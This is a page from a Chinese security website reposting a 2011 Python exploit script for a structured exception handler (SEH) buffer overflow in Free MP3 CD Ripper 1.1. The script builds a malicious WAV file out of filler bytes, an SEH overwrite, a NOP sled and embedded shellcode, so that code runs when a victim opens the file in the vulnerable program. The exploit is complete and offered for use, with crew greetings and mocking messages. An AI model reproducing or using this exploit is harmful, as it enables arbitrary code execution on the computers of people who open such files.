首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free MP3 CD Ripper 1.1 Buffer Overflow (SEH)
来源:http://www.pirate.al 作者:X-h4ck 发布时间:2011-08-30  
#!/usr/bin/python
#
# #############################################################################
# Exploit Title : Free MP3 CD Ripper 1.1 Buffer Overflow (SEH)          
# Software	    : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
# Version	    : 1.1
# Tested on	    : Windows XP sp3 (en)
# Date		    : 28/08/2011
# Author		: X-h4ck
# Website	    : http://www.pirate.al , http://theflashcrew.blogspot.com 
# PirateAL Crew (2011)
# Email		    : mem001@live.com
# Greetz		: Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath  
#                 mywisdom - bi0 - Slimshaddy - d3trimentaL - Lekosta - Rigon
#                 H-Down - H3ll - Pretorian
# #############################################################################

filename = "3v1lf1l3.wav"
print "cr34t1ng 3v1l f1l3"

junk = "\x41" * 4116
nseh = "\xeb\x06\x90\x90"
seh  = "\xD9\x9A\x2E\x58"
nops = "\x90" * 30

shellcode = ("\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\xdf\xd9\x74\x24"
"\xf4\x5b\x31\x43\x0e\x03\x43\x0e\x83\x49\x1c\x06\xb1\x71"
"\x35\x4e\x3a\x89\xc6\x31\xb2\x6c\xf7\x63\xa0\xe5\xaa\xb3"
"\xa2\xab\x46\x3f\xe6\x5f\xdc\x4d\x2f\x50\x55\xfb\x09\x5f"
"\x66\xcd\x95\x33\xa4\x4f\x6a\x49\xf9\xaf\x53\x82\x0c\xb1"
"\x94\xfe\xff\xe3\x4d\x75\xad\x13\xf9\xcb\x6e\x15\x2d\x40"
"\xce\x6d\x48\x96\xbb\xc7\x53\xc6\x14\x53\x1b\xfe\x1f\x3b"
"\xbc\xff\xcc\x5f\x80\xb6\x79\xab\x72\x49\xa8\xe5\x7b\x78"
"\x94\xaa\x45\xb5\x19\xb2\x82\x71\xc2\xc1\xf8\x82\x7f\xd2"
"\x3a\xf9\x5b\x57\xdf\x59\x2f\xcf\x3b\x58\xfc\x96\xc8\x56"
"\x49\xdc\x97\x7a\x4c\x31\xac\x86\xc5\xb4\x63\x0f\x9d\x92"
"\xa7\x54\x45\xba\xfe\x30\x28\xc3\xe1\x9c\x95\x61\x69\x0e"
"\xc1\x10\x30\x44\x14\x90\x4e\x21\x16\xaa\x50\x01\x7f\x9b"
"\xdb\xce\xf8\x24\x0e\xab\xe7\xc6\x9b\xc1\x8f\x5e\x4e\x68"
"\xd2\x60\xa4\xae\xeb\xe2\x4d\x4e\x08\xfa\x27\x4b\x54\xbc"
"\xd4\x21\xc5\x29\xdb\x96\xe6\x7b\xb8\x79\x75\xe7\x11\x1c"
"\xfd\x82\x6d")

PirateAL = junk+nseh+seh+nops+shellcode
FILE = open(filename, "w")
FILE.write(PirateAL)
FILE.close()
print "t1m3 f0r pwn4g3"
print " pirate.al , theflashcrew.blogspot.com "

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows7/win2008 提权0day
·DVD X Player 5.5 Professional
·构造注入点后门代码(asp,aspx,p
·Rainer v0.1 by localh0t
·mp3 Kaydet Local Buffer Overfl
·Apache httpd Remote Denial of
·DVD X Player 5.5.0 Pro / Stand
·HTTPKiller - FHTTP Kit by Xian
·Citrix Gateway ActiveX Control
·LifeSize Room Command Injectio
·Linux Kernel 'perf_count_sw_cp
·Mini-stream Ripper 2.9.7.273 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved